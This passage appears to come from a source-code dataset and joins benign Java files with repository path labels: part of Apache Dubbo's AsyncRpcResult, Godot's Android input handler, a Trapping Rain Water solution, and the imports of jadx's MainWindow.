ThreadlessExecutor threadlessExecutor = (ThreadlessExecutor) executor;
threadlessExecutor.waitAndDrain();
}
return responseFuture.get(timeout, unit);
}
@Override
public Object recreate() throws Throwable {
RpcInvocation rpcInvocation = (RpcInvocation) invocation;
if (InvokeMode.FUTURE == rpcInvocation.getInvokeMode()) {
return RpcContext.getContext().getFuture();
}
return getAppResponse().recreate();
}
public Result whenCompleteWithContext(BiConsumer<Result, Throwable> fn) {
this.responseFuture = this.responseFuture.whenComplete((v, t) -> {
beforeContext.accept(v, t);
fn.accept(v, t);
afterContext.accept(v, t);
});
return this;
}
@Override
public <U> CompletableFuture<U> thenApply(Function<Result, ? extends U> fn) {
return this.responseFuture.thenApply(fn);
}
@Override
@Deprecated
public Map<String, String> getAttachments() {
return getAppResponse().getAttachments();
}
@Override
public Map<String, Object> getObjectAttachments() {
return getAppResponse().getObjectAttachments();
}
@Override
public void setAttachments(Map<String, String> map) {
getAppResponse().setAttachments(map);
}
@Override
public void setObjectAttachments(Map<String, Object> map) {
getAppResponse().setObjectAttachments(map);
}
@Deprecated
@Override
public void addAttachments(Map<String, String> map) {
getAppResponse().addAttachments(map);
}
@Override
public void addObjectAttachments(Map<String, Object> map) {
getAppResponse().addObjectAttachments(map);
}
@Override
public String getAttachment(String key) {
return getAppResponse().getAttachment(key);
}
@Override
public Object getObjectAttachment(String key) {
return getAppResponse().getObjectAttachment(key);
}
@Override
public String getAttachment(String key, String defaultValue) {
return getAppResponse().getAttachment(key, defaultValue);
}
@Override
public Object getObjectAttachment(String key, Object defaultValue) {
return getAppResponse().getObjectAttachment(key, defaultValue);
}
@Override
public void setAttachment(String key, String value) {
setObjectAttachment(key, value);
}
@Override
public void setAttachment(String key, Object value) {
setObjectAttachment(key, value);
}
@Override
public void setObjectAttachment(String key, Object value) {
getAppResponse().setAttachment(key, value);
}
public Executor getExecutor() {
return executor;
}
public void setExecutor(Executor executor) {
this.executor = executor;
}
/**
 * Temporary context to use when the thread switches to a Dubbo thread.
*/
private RpcContext tmpContext;
private RpcContext tmpServerContext;
private BiConsumer<Result, Throwable> beforeContext = (appResponse, t) -> {
tmpContext = RpcContext.getContext();
tmpServerContext = RpcContext.getServerContext();
RpcContext.restoreContext(storedContext);
RpcContext.restoreServerContext(storedServerContext);
};
private BiConsumer<Result, Throwable> afterContext = (appResponse, t) -> {
RpcContext.restoreContext(tmpContext);
RpcContext.restoreServerContext(tmpServerContext);
};
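    // Illustrative sketch (not part of the original class): a callback registered through
    // whenCompleteWithContext() runs with the caller's RpcContext restored by beforeContext,
    // and afterContext puts the Dubbo-thread context back once it returns. The "traceId"
    // attachment key below is hypothetical.
    private static void contextAwareCallbackSketch(AsyncRpcResult asyncResult) {
        asyncResult.whenCompleteWithContext((appResponse, throwable) -> {
            if (throwable != null) {
                logger.error("RPC call failed", throwable);
                return;
            }
            // RpcContext here is the one captured when the call was originally made.
            logger.info("traceId attachment: " + RpcContext.getContext().getAttachment("traceId"));
        });
    }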
/**
* Some utility methods used to quickly generate default AsyncRpcResult instance.
*/
public static AsyncRpcResult newDefaultAsyncResult(AppResponse appResponse, Invocation invocation) {
return new AsyncRpcResult(CompletableFuture.completedFuture(appResponse), invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Invocation invocation) {
return newDefaultAsyncResult(null, null, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Object value, Invocation invocation) {
return newDefaultAsyncResult(value, null, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Throwable t, Invocation invocation) {
return newDefaultAsyncResult(null, t, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Object value, Throwable t, Invocation invocation) {
CompletableFuture<AppResponse> future = new CompletableFuture<>();
AppResponse result = new AppResponse(invocation);
if (t != null) {
result.setException(t);
} else {
result.setValue(value);
}
future.complete(result);
return new AsyncRpcResult(future, invocation);
}
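    // Usage sketch (illustrative): a mock or short-circuiting filter can hand back an already
    // completed result for a given invocation, e.g.
    //   AsyncRpcResult mocked = AsyncRpcResult.newDefaultAsyncResult("pong", invocation);
    //   Object value = mocked.getValue(); // "pong"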
private static Result createDefaultValue(Invocation invocation) {
ConsumerMethodModel method = (ConsumerMethodModel) invocation.get(Constants.METHOD_MODEL);
return method != null ? new AppResponse(defaultReturn(method.getReturnClass())) : new AppResponse();
}
}
| apache/dubbo | dubbo-rpc/dubbo-rpc-api/src/main/java/org/apache/dubbo/rpc/AsyncRpcResult.java |
1,012 | /**************************************************************************/
/* GodotInputHandler.java */
/**************************************************************************/
/* This file is part of: */
/* GODOT ENGINE */
/* https://godotengine.org */
/**************************************************************************/
/* Copyright (c) 2014-present Godot Engine contributors (see AUTHORS.md). */
/* Copyright (c) 2007-2014 Juan Linietsky, Ariel Manzur. */
/* */
/* Permission is hereby granted, free of charge, to any person obtaining */
/* a copy of this software and associated documentation files (the */
/* "Software"), to deal in the Software without restriction, including */
/* without limitation the rights to use, copy, modify, merge, publish, */
/* distribute, sublicense, and/or sell copies of the Software, and to */
/* permit persons to whom the Software is furnished to do so, subject to */
/* the following conditions: */
/* */
/* The above copyright notice and this permission notice shall be */
/* included in all copies or substantial portions of the Software. */
/* */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, */
/* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF */
/* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. */
/* IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY */
/* CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, */
/* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE */
/* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */
/**************************************************************************/
package org.godotengine.godot.input;
import static org.godotengine.godot.utils.GLUtils.DEBUG;
import org.godotengine.godot.GodotLib;
import org.godotengine.godot.GodotRenderView;
import android.content.Context;
import android.hardware.input.InputManager;
import android.os.Build;
import android.util.Log;
import android.util.SparseArray;
import android.util.SparseIntArray;
import android.view.GestureDetector;
import android.view.InputDevice;
import android.view.KeyEvent;
import android.view.MotionEvent;
import android.view.ScaleGestureDetector;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;
/**
* Handles input related events for the {@link GodotRenderView} view.
*/
public class GodotInputHandler implements InputManager.InputDeviceListener {
private static final String TAG = GodotInputHandler.class.getSimpleName();
private static final int ROTARY_INPUT_VERTICAL_AXIS = 1;
private static final int ROTARY_INPUT_HORIZONTAL_AXIS = 0;
private final SparseIntArray mJoystickIds = new SparseIntArray(4);
private final SparseArray<Joystick> mJoysticksDevices = new SparseArray<>(4);
private final GodotRenderView mRenderView;
private final InputManager mInputManager;
private final GestureDetector gestureDetector;
private final ScaleGestureDetector scaleGestureDetector;
private final GodotGestureHandler godotGestureHandler;
/**
* Used to decide whether mouse capture can be enabled.
*/
private int lastSeenToolType = MotionEvent.TOOL_TYPE_UNKNOWN;
private static int rotaryInputAxis = ROTARY_INPUT_VERTICAL_AXIS;
public GodotInputHandler(GodotRenderView godotView) {
final Context context = godotView.getView().getContext();
mRenderView = godotView;
mInputManager = (InputManager)context.getSystemService(Context.INPUT_SERVICE);
mInputManager.registerInputDeviceListener(this, null);
this.godotGestureHandler = new GodotGestureHandler();
this.gestureDetector = new GestureDetector(context, godotGestureHandler);
this.gestureDetector.setIsLongpressEnabled(false);
this.scaleGestureDetector = new ScaleGestureDetector(context, godotGestureHandler);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
this.scaleGestureDetector.setStylusScaleEnabled(true);
}
}
/**
* Enable long press events. This is false by default.
*/
public void enableLongPress(boolean enable) {
this.gestureDetector.setIsLongpressEnabled(enable);
}
/**
* Enable multi-fingers pan & scale gestures. This is false by default.
* <p>
* Note: This may interfere with multi-touch handling / support.
*/
public void enablePanningAndScalingGestures(boolean enable) {
this.godotGestureHandler.setPanningAndScalingEnabled(enable);
}
/**
* On Wear OS devices, sets which axis of the mouse wheel rotary input is mapped to. This is 1 (vertical axis) by default.
*/
public void setRotaryInputAxis(int axis) {
rotaryInputAxis = axis;
}
private boolean isKeyEventGameDevice(int source) {
// Note that keyboards are often (SOURCE_KEYBOARD | SOURCE_DPAD)
if (source == (InputDevice.SOURCE_KEYBOARD | InputDevice.SOURCE_DPAD))
return false;
return (source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_DPAD) == InputDevice.SOURCE_DPAD || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD;
}
public boolean canCapturePointer() {
return lastSeenToolType == MotionEvent.TOOL_TYPE_MOUSE;
}
public void onPointerCaptureChange(boolean hasCapture) {
godotGestureHandler.onPointerCaptureChange(hasCapture);
}
public boolean onKeyUp(final int keyCode, KeyEvent event) {
if (keyCode == KeyEvent.KEYCODE_BACK) {
return true;
}
if (keyCode == KeyEvent.KEYCODE_VOLUME_UP || keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) {
return false;
}
int source = event.getSource();
if (isKeyEventGameDevice(source)) {
// Check if the device exists
final int deviceId = event.getDeviceId();
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int button = getGodotButton(keyCode);
final int godotJoyId = mJoystickIds.get(deviceId);
GodotLib.joybutton(godotJoyId, button, false);
}
} else {
// getKeyCode(): The physical key that was pressed.
final int physical_keycode = event.getKeyCode();
final int unicode = event.getUnicodeChar();
final int key_label = event.getDisplayLabel();
GodotLib.key(physical_keycode, unicode, key_label, false, event.getRepeatCount() > 0);
		}
return true;
}
public boolean onKeyDown(final int keyCode, KeyEvent event) {
if (keyCode == KeyEvent.KEYCODE_BACK) {
mRenderView.onBackPressed();
			// Pressing the 'back' button should not terminate the program;
			// the 'back' event is normally handled in game logic.
return true;
}
if (keyCode == KeyEvent.KEYCODE_VOLUME_UP || keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) {
return false;
}
int source = event.getSource();
final int deviceId = event.getDeviceId();
// Check if source is a game device and that the device is a registered gamepad
if (isKeyEventGameDevice(source)) {
if (event.getRepeatCount() > 0) // ignore key echo
return true;
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int button = getGodotButton(keyCode);
final int godotJoyId = mJoystickIds.get(deviceId);
GodotLib.joybutton(godotJoyId, button, true);
}
} else {
final int physical_keycode = event.getKeyCode();
final int unicode = event.getUnicodeChar();
final int key_label = event.getDisplayLabel();
GodotLib.key(physical_keycode, unicode, key_label, true, event.getRepeatCount() > 0);
}
return true;
}
public boolean onTouchEvent(final MotionEvent event) {
lastSeenToolType = event.getToolType(0);
this.scaleGestureDetector.onTouchEvent(event);
if (this.gestureDetector.onTouchEvent(event)) {
// The gesture detector has handled the event.
return true;
}
if (godotGestureHandler.onMotionEvent(event)) {
// The gesture handler has handled the event.
return true;
}
// Drag events are handled by the [GodotGestureHandler]
if (event.getActionMasked() == MotionEvent.ACTION_MOVE) {
return true;
}
if (isMouseEvent(event)) {
return handleMouseEvent(event);
}
return handleTouchEvent(event);
}
public boolean onGenericMotionEvent(MotionEvent event) {
lastSeenToolType = event.getToolType(0);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M && gestureDetector.onGenericMotionEvent(event)) {
// The gesture detector has handled the event.
return true;
}
if (godotGestureHandler.onMotionEvent(event)) {
// The gesture handler has handled the event.
return true;
}
if (event.isFromSource(InputDevice.SOURCE_JOYSTICK) && event.getActionMasked() == MotionEvent.ACTION_MOVE) {
// Check if the device exists
final int deviceId = event.getDeviceId();
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int godotJoyId = mJoystickIds.get(deviceId);
Joystick joystick = mJoysticksDevices.get(deviceId);
if (joystick == null) {
return true;
}
for (int i = 0; i < joystick.axes.size(); i++) {
final int axis = joystick.axes.get(i);
final float value = event.getAxisValue(axis);
/*
As all axes are polled for each event, only fire an axis event if the value has actually changed.
Prevents flooding Godot with repeated events.
*/
if (joystick.axesValues.indexOfKey(axis) < 0 || (float)joystick.axesValues.get(axis) != value) {
// save value to prevent repeats
joystick.axesValues.put(axis, value);
GodotLib.joyaxis(godotJoyId, i, value);
}
}
if (joystick.hasAxisHat) {
final int hatX = Math.round(event.getAxisValue(MotionEvent.AXIS_HAT_X));
final int hatY = Math.round(event.getAxisValue(MotionEvent.AXIS_HAT_Y));
if (joystick.hatX != hatX || joystick.hatY != hatY) {
joystick.hatX = hatX;
joystick.hatY = hatY;
GodotLib.joyhat(godotJoyId, hatX, hatY);
}
}
return true;
}
} else {
return handleMouseEvent(event);
}
return false;
}
public void initInputDevices() {
		/* Initially add input devices. */
int[] deviceIds = mInputManager.getInputDeviceIds();
for (int deviceId : deviceIds) {
InputDevice device = mInputManager.getInputDevice(deviceId);
if (DEBUG) {
Log.v(TAG, String.format("init() deviceId:%d, Name:%s\n", deviceId, device.getName()));
}
onInputDeviceAdded(deviceId);
}
}
private int assignJoystickIdNumber(int deviceId) {
int godotJoyId = 0;
while (mJoystickIds.indexOfValue(godotJoyId) >= 0) {
godotJoyId++;
}
mJoystickIds.put(deviceId, godotJoyId);
return godotJoyId;
}
@Override
public void onInputDeviceAdded(int deviceId) {
// Check if the device has not been already added
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
return;
}
InputDevice device = mInputManager.getInputDevice(deviceId);
//device can be null if deviceId is not found
if (device == null) {
return;
}
int sources = device.getSources();
// Device may not be a joystick or gamepad
if ((sources & InputDevice.SOURCE_GAMEPAD) != InputDevice.SOURCE_GAMEPAD &&
(sources & InputDevice.SOURCE_JOYSTICK) != InputDevice.SOURCE_JOYSTICK) {
return;
}
// Assign first available number. Reuse numbers where possible.
final int id = assignJoystickIdNumber(deviceId);
final Joystick joystick = new Joystick();
joystick.device_id = deviceId;
joystick.name = device.getName();
//Helps with creating new joypad mappings.
Log.i(TAG, "=== New Input Device: " + joystick.name);
Set<Integer> already = new HashSet<>();
for (InputDevice.MotionRange range : device.getMotionRanges()) {
boolean isJoystick = range.isFromSource(InputDevice.SOURCE_JOYSTICK);
boolean isGamepad = range.isFromSource(InputDevice.SOURCE_GAMEPAD);
if (!isJoystick && !isGamepad) {
continue;
}
final int axis = range.getAxis();
if (axis == MotionEvent.AXIS_HAT_X || axis == MotionEvent.AXIS_HAT_Y) {
joystick.hasAxisHat = true;
} else {
if (!already.contains(axis)) {
already.add(axis);
joystick.axes.add(axis);
} else {
Log.w(TAG, " - DUPLICATE AXIS VALUE IN LIST: " + axis);
}
}
}
Collections.sort(joystick.axes);
for (int idx = 0; idx < joystick.axes.size(); idx++) {
//Helps with creating new joypad mappings.
Log.i(TAG, " - Mapping Android axis " + joystick.axes.get(idx) + " to Godot axis " + idx);
}
mJoysticksDevices.put(deviceId, joystick);
GodotLib.joyconnectionchanged(id, true, joystick.name);
}
@Override
public void onInputDeviceRemoved(int deviceId) {
// Check if the device has not been already removed
if (mJoystickIds.indexOfKey(deviceId) < 0) {
return;
}
final int godotJoyId = mJoystickIds.get(deviceId);
mJoystickIds.delete(deviceId);
mJoysticksDevices.delete(deviceId);
GodotLib.joyconnectionchanged(godotJoyId, false, "");
}
@Override
public void onInputDeviceChanged(int deviceId) {
onInputDeviceRemoved(deviceId);
onInputDeviceAdded(deviceId);
}
public static int getGodotButton(int keyCode) {
int button;
switch (keyCode) {
case KeyEvent.KEYCODE_BUTTON_A: // Android A is SNES B
button = 0;
break;
case KeyEvent.KEYCODE_BUTTON_B:
button = 1;
break;
case KeyEvent.KEYCODE_BUTTON_X: // Android X is SNES Y
button = 2;
break;
case KeyEvent.KEYCODE_BUTTON_Y:
button = 3;
break;
case KeyEvent.KEYCODE_BUTTON_L1:
button = 9;
break;
case KeyEvent.KEYCODE_BUTTON_L2:
button = 15;
break;
case KeyEvent.KEYCODE_BUTTON_R1:
button = 10;
break;
case KeyEvent.KEYCODE_BUTTON_R2:
button = 16;
break;
case KeyEvent.KEYCODE_BUTTON_SELECT:
button = 4;
break;
case KeyEvent.KEYCODE_BUTTON_START:
button = 6;
break;
case KeyEvent.KEYCODE_BUTTON_THUMBL:
button = 7;
break;
case KeyEvent.KEYCODE_BUTTON_THUMBR:
button = 8;
break;
case KeyEvent.KEYCODE_DPAD_UP:
button = 11;
break;
case KeyEvent.KEYCODE_DPAD_DOWN:
button = 12;
break;
case KeyEvent.KEYCODE_DPAD_LEFT:
button = 13;
break;
case KeyEvent.KEYCODE_DPAD_RIGHT:
button = 14;
break;
case KeyEvent.KEYCODE_BUTTON_C:
button = 17;
break;
case KeyEvent.KEYCODE_BUTTON_Z:
button = 18;
break;
default:
button = keyCode - KeyEvent.KEYCODE_BUTTON_1 + 20;
break;
}
return button;
}
static boolean isMouseEvent(MotionEvent event) {
return isMouseEvent(event.getSource());
}
private static boolean isMouseEvent(int eventSource) {
boolean mouseSource = ((eventSource & InputDevice.SOURCE_MOUSE) == InputDevice.SOURCE_MOUSE) || ((eventSource & InputDevice.SOURCE_STYLUS) == InputDevice.SOURCE_STYLUS);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
mouseSource = mouseSource || ((eventSource & InputDevice.SOURCE_MOUSE_RELATIVE) == InputDevice.SOURCE_MOUSE_RELATIVE);
}
return mouseSource;
}
static boolean handleMotionEvent(final MotionEvent event) {
if (isMouseEvent(event)) {
return handleMouseEvent(event);
}
return handleTouchEvent(event);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y) {
return handleMotionEvent(eventSource, eventAction, buttonsMask, x, y, false);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y, boolean doubleTap) {
return handleMotionEvent(eventSource, eventAction, buttonsMask, x, y, 0, 0, doubleTap);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleTap) {
if (isMouseEvent(eventSource)) {
return handleMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleTap, false);
}
return handleTouchEvent(eventAction, x, y, doubleTap);
}
static boolean handleMouseEvent(final MotionEvent event) {
final int eventAction = event.getActionMasked();
final float x = event.getX();
final float y = event.getY();
final int buttonsMask = event.getButtonState();
final float pressure = event.getPressure();
		// Orientation is returned as a radian value between 0 and pi clockwise, or 0 and -pi counterclockwise.
final float orientation = event.getOrientation();
		// Tilt is zero when perpendicular to the screen and pi/2 when flat on the surface.
final float tilt = event.getAxisValue(MotionEvent.AXIS_TILT);
float tiltMult = (float)Math.sin(tilt);
// To be consistent with expected tilt.
final float tiltX = (float)-Math.sin(orientation) * tiltMult;
final float tiltY = (float)Math.cos(orientation) * tiltMult;
float verticalFactor = 0;
float horizontalFactor = 0;
		// If the event came from a rotary encoder (bezel or crown rotation on Wear OS smartwatches),
		// convert it to a mouse wheel event.
if (event.isFromSource(InputDevice.SOURCE_ROTARY_ENCODER)) {
if (rotaryInputAxis == ROTARY_INPUT_HORIZONTAL_AXIS) {
horizontalFactor = -event.getAxisValue(MotionEvent.AXIS_SCROLL);
} else {
// If rotaryInputAxis is not ROTARY_INPUT_HORIZONTAL_AXIS then use default ROTARY_INPUT_VERTICAL_AXIS axis.
verticalFactor = -event.getAxisValue(MotionEvent.AXIS_SCROLL);
}
} else {
verticalFactor = event.getAxisValue(MotionEvent.AXIS_VSCROLL);
horizontalFactor = event.getAxisValue(MotionEvent.AXIS_HSCROLL);
}
boolean sourceMouseRelative = false;
if (android.os.Build.VERSION.SDK_INT >= android.os.Build.VERSION_CODES.O) {
sourceMouseRelative = event.isFromSource(InputDevice.SOURCE_MOUSE_RELATIVE);
}
return handleMouseEvent(eventAction, buttonsMask, x, y, horizontalFactor, verticalFactor, false, sourceMouseRelative, pressure, tiltX, tiltY);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y) {
return handleMouseEvent(eventAction, buttonsMask, x, y, 0, 0, false, false);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleClick, boolean sourceMouseRelative) {
return handleMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleClick, sourceMouseRelative, 1, 0, 0);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleClick, boolean sourceMouseRelative, float pressure, float tiltX, float tiltY) {
// Fix the buttonsMask
switch (eventAction) {
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
// Zero-up the button state
buttonsMask = 0;
break;
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_MOVE:
if (buttonsMask == 0) {
buttonsMask = MotionEvent.BUTTON_PRIMARY;
}
break;
}
// We don't handle ACTION_BUTTON_PRESS and ACTION_BUTTON_RELEASE events as they typically
// follow ACTION_DOWN and ACTION_UP events. As such, handling them would result in duplicate
// stream of events to the engine.
switch (eventAction) {
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_HOVER_ENTER:
case MotionEvent.ACTION_HOVER_EXIT:
case MotionEvent.ACTION_HOVER_MOVE:
case MotionEvent.ACTION_MOVE:
case MotionEvent.ACTION_SCROLL: {
GodotLib.dispatchMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleClick, sourceMouseRelative, pressure, tiltX, tiltY);
return true;
}
}
return false;
}
static boolean handleTouchEvent(final MotionEvent event) {
final int pointerCount = event.getPointerCount();
if (pointerCount == 0) {
return true;
}
final float[] positions = new float[pointerCount * 3]; // pointerId1, x1, y1, pointerId2, etc...
for (int i = 0; i < pointerCount; i++) {
positions[i * 3 + 0] = event.getPointerId(i);
positions[i * 3 + 1] = event.getX(i);
positions[i * 3 + 2] = event.getY(i);
}
final int action = event.getActionMasked();
final int actionPointerId = event.getPointerId(event.getActionIndex());
return handleTouchEvent(action, actionPointerId, pointerCount, positions, false);
}
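	// Layout note (illustrative): for two pointers, pointer 0 at (10, 20) and pointer 1 at (30, 40),
	// the positions array built above would be { 0, 10, 20, 1, 30, 40 }, i.e. one
	// [pointerId, x, y] triplet per pointer, with the action pointer id passed separately.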
static boolean handleTouchEvent(int eventAction, float x, float y, boolean doubleTap) {
return handleTouchEvent(eventAction, 0, 1, new float[] { 0, x, y }, doubleTap);
}
static boolean handleTouchEvent(int eventAction, int actionPointerId, int pointerCount, float[] positions, boolean doubleTap) {
switch (eventAction) {
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
case MotionEvent.ACTION_MOVE:
case MotionEvent.ACTION_POINTER_UP:
case MotionEvent.ACTION_POINTER_DOWN: {
GodotLib.dispatchTouchEvent(eventAction, actionPointerId, pointerCount, positions, doubleTap);
return true;
}
}
return false;
}
}
| godotengine/godot | platform/android/java/lib/src/org/godotengine/godot/input/GodotInputHandler.java |
1,014 | // Given n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining.
// For example,
// Given [0,1,0,2,1,0,1,3,2,1,2,1], return 6.
public class TrappingRainWater {
public int trap(int[] height) {
int water = 0;
int leftIndex = 0;
int rightIndex = height.length - 1;
int leftMax = 0;
int rightMax = 0;
while(leftIndex <= rightIndex) {
leftMax = Math.max(leftMax, height[leftIndex]);
rightMax = Math.max(rightMax, height[rightIndex]);
if(leftMax < rightMax) {
water += leftMax - height[leftIndex];
leftIndex++;
} else {
water += rightMax - height[rightIndex];
rightIndex--;
}
}
return water;
}
}
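// Quick usage sketch (not part of the original solution): running the two-pointer
// implementation above on the example from the problem statement prints 6.
class TrappingRainWaterDemo {
    public static void main(String[] args) {
        int[] height = {0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1};
        System.out.println(new TrappingRainWater().trap(height)); // expected output: 6
    }
}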
| kdn251/interviews | company/twitter/TrappingRainWater.java |
1,017 | package jadx.gui.ui;
import java.awt.BorderLayout;
import java.awt.Component;
import java.awt.Dimension;
import java.awt.DisplayMode;
import java.awt.Font;
import java.awt.GraphicsDevice;
import java.awt.GraphicsEnvironment;
import java.awt.Rectangle;
import java.awt.dnd.DnDConstants;
import java.awt.dnd.DropTarget;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.FocusAdapter;
import java.awt.event.FocusEvent;
import java.awt.event.KeyAdapter;
import java.awt.event.KeyEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.awt.event.WindowAdapter;
import java.awt.event.WindowEvent;
import java.awt.geom.AffineTransform;
import java.io.InputStream;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.EnumSet;
import java.util.List;
import java.util.Locale;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Consumer;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.Box;
import javax.swing.ImageIcon;
import javax.swing.JCheckBox;
import javax.swing.JCheckBoxMenuItem;
import javax.swing.JDialog;
import javax.swing.JFileChooser;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JMenu;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JPopupMenu;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import javax.swing.JToggleButton;
import javax.swing.JToolBar;
import javax.swing.JTree;
import javax.swing.SwingUtilities;
import javax.swing.ToolTipManager;
import javax.swing.WindowConstants;
import javax.swing.event.TreeExpansionEvent;
import javax.swing.event.TreeWillExpandListener;
import javax.swing.tree.DefaultMutableTreeNode;
import javax.swing.tree.DefaultTreeCellRenderer;
import javax.swing.tree.DefaultTreeModel;
import javax.swing.tree.TreeNode;
import javax.swing.tree.TreePath;
import javax.swing.tree.TreeSelectionModel;
import org.fife.ui.rsyntaxtextarea.RSyntaxTextArea;
import org.fife.ui.rsyntaxtextarea.Theme;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import ch.qos.logback.classic.Level;
import jadx.api.JadxArgs;
import jadx.api.JadxDecompiler;
import jadx.api.JavaClass;
import jadx.api.JavaNode;
import jadx.api.ResourceFile;
import jadx.api.plugins.events.IJadxEvents;
import jadx.api.plugins.events.JadxEvents;
import jadx.api.plugins.events.types.ReloadProject;
import jadx.api.plugins.utils.CommonFileUtils;
import jadx.core.Jadx;
import jadx.core.export.TemplateFile;
import jadx.core.plugins.events.JadxEventsImpl;
import jadx.core.utils.ListUtils;
import jadx.core.utils.StringUtils;
import jadx.core.utils.android.AndroidManifestParser;
import jadx.core.utils.android.AppAttribute;
import jadx.core.utils.android.ApplicationParams;
import jadx.core.utils.exceptions.JadxRuntimeException;
import jadx.core.utils.files.FileUtils;
import jadx.gui.JadxWrapper;
import jadx.gui.cache.manager.CacheManager;
import jadx.gui.device.debugger.BreakpointManager;
import jadx.gui.events.services.RenameService;
import jadx.gui.jobs.BackgroundExecutor;
import jadx.gui.jobs.DecompileTask;
import jadx.gui.jobs.ExportTask;
import jadx.gui.jobs.TaskStatus;
import jadx.gui.logs.LogCollector;
import jadx.gui.logs.LogOptions;
import jadx.gui.logs.LogPanel;
import jadx.gui.plugins.mappings.RenameMappingsGui;
import jadx.gui.plugins.quark.QuarkDialog;
import jadx.gui.settings.JadxProject;
import jadx.gui.settings.JadxSettings;
import jadx.gui.settings.ui.JadxSettingsWindow;
import jadx.gui.settings.ui.plugins.PluginSettings;
import jadx.gui.treemodel.ApkSignature;
import jadx.gui.treemodel.JClass;
import jadx.gui.treemodel.JLoadableNode;
import jadx.gui.treemodel.JNode;
import jadx.gui.treemodel.JPackage;
import jadx.gui.treemodel.JResource;
import jadx.gui.treemodel.JRoot;
import jadx.gui.ui.action.ActionModel;
import jadx.gui.ui.action.JadxGuiAction;
import jadx.gui.ui.codearea.AbstractCodeArea;
import jadx.gui.ui.codearea.AbstractCodeContentPanel;
import jadx.gui.ui.codearea.EditorTheme;
import jadx.gui.ui.codearea.EditorViewState;
import jadx.gui.ui.dialog.ADBDialog;
import jadx.gui.ui.dialog.AboutDialog;
import jadx.gui.ui.dialog.LogViewerDialog;
import jadx.gui.ui.dialog.SearchDialog;
import jadx.gui.ui.filedialog.FileDialogWrapper;
import jadx.gui.ui.filedialog.FileOpenMode;
import jadx.gui.ui.menu.HiddenMenuItem;
import jadx.gui.ui.menu.JadxMenu;
import jadx.gui.ui.menu.JadxMenuBar;
import jadx.gui.ui.panel.ContentPanel;
import jadx.gui.ui.panel.IssuesPanel;
import jadx.gui.ui.panel.JDebuggerPanel;
import jadx.gui.ui.panel.ProgressPanel;
import jadx.gui.ui.popupmenu.RecentProjectsMenuListener;
import jadx.gui.ui.tab.TabbedPane;
import jadx.gui.ui.tab.dnd.TabDndController;
import jadx.gui.ui.treenodes.StartPageNode;
import jadx.gui.ui.treenodes.SummaryNode;
import jadx.gui.update.JadxUpdate;
import jadx.gui.update.JadxUpdate.IUpdateCallback;
import jadx.gui.update.data.Release;
import jadx.gui.utils.CacheObject;
import jadx.gui.utils.FontUtils;
import jadx.gui.utils.ILoadListener;
import jadx.gui.utils.LafManager;
import jadx.gui.utils.Link;
import jadx.gui.utils.NLS;
import jadx.gui.utils.UiUtils;
import jadx.gui.utils.fileswatcher.LiveReloadWorker;
import jadx.gui.utils.shortcut.ShortcutsController;
import jadx.gui.utils.ui.ActionHandler;
import jadx.gui.utils.ui.NodeLabel;
import static io.reactivex.internal.functions.Functions.EMPTY_RUNNABLE;
public class MainWindow extends JFrame {
